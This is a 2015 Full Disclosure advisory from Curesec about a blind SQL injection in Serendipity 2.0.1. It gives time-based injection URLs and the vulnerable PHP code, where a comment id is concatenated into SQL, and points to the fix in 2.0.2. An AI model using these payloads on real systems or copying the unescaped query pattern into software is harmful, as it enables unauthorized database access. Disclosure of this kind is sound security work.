| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <55E5900F.6090601@curesec.com>
Date: Tue, 1 Sep 2015 13:46:23 +0200
From: "Curesec Research Team (CRT)" <crt@...esec.com>
To: fulldisclosure@...lists.org
Subject: [FD] Serendipity 2.0.1 - Blind SQL Injection
Serendipity 2.0.1: Blind SQL Injection
Security Advisory – Curesec Research Team
1. Introduction
Affected Product: Serendipity 2.0.1
Fixed in: 2.0.2
Fixed Version Link:
https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip
Vendor Contact: serendipity@...ergarv.de
Vulnerability Type: Blind SQL Injection
Remote Exploitable: Yes
Reported to vendor: 07/21/2015
Disclosed to public: 09/01/2015
Release mode: Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
There is a blind SQL injection in Serendipity 2.0.1 when approving
comments. It can be exploited content-based, but this requires an Email
token. Timing-based exploitation does not require a token and is thus
easier to exploit.
To prepare for the attack, an attacker has to visit the Configuration
and set "Use Tokens for Comment Moderation" to true.
Please note that admin credentials are required.
3. Proof of Concept
http://localhost/serendipity/serendipity_admin.php?serendipity[action]=admin&serendipity[adminModule]=comments&serendipity[adminAction]=pending&serendipity[id]=8'
AND IF(SUBSTRING(version(), 1,
1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)
%23&serendipity[token]=ValidAntiCSRFToken
-> true
http://localhost//serendipity/serendipity_admin.php?serendipity[action]=admin&serendipity[adminModule]=comments&serendipity[adminAction]=approve&serendipity[id]=8'
AND IF(SUBSTRING(version(), 1,
1)='4',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)
%23&serendipity[token]=ValidAntiCSRFToken
-> false
Note that the id must be that of an existing comment, the action must be
acceptable - ie only pending comments can be approved and only approved
comments can be set to pending - and the CSRF token must be valid.
4. Code
/include/admin/comments.inc.php
serendipity_approveComment($serendipity['GET']['id'],
$rs['entry_id']); <- user input
/include/functions_comments.inc.php
function serendipity_approveComment($cid, $entry_id, $force =
false, $moderate = false, $token = false) {
global $serendipity;
$goodtoken = serendipity_checkCommentToken($token, $cid); <-
not secured
[...]
}
function serendipity_checkCommentToken($token, $cid) {
global $serendipity;
$goodtoken = false;
if ($serendipity['useCommentTokens']) {
// Delete any comment tokens older than 1 week.
serendipity_db_query("DELETE FROM
{$serendipity['dbPrefix']}options
WHERE okey LIKE 'comment_%' AND
name < " . (time() - 604800) );
// Get the token for this comment id
$tokencheck = serendipity_db_query("SELECT * FROM
{$serendipity['dbPrefix']}options
WHERE okey =
'comment_" . $cid . "' LIMIT 1", true, 'assoc'); <- still not secured
[...]
}
5. Solution
To mitigate this issue please upgrade at least to version 2.0.2:
https://github.com/s9y/Serendipity/releases/download/2.0.2/serendipity-2.0.2.zip
Please note that a newer version might already be available.
5. Report Timeline
07/21/2015 Informed Vendor about Issue
07/24/2015 Vendor releases Version 2.0.2
09/01/2015 Disclosed to public
6. Blog Reference:
http://blog.curesec.com/article/blog/Serendipity-201-Blind-SQL-Injection-52.html
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists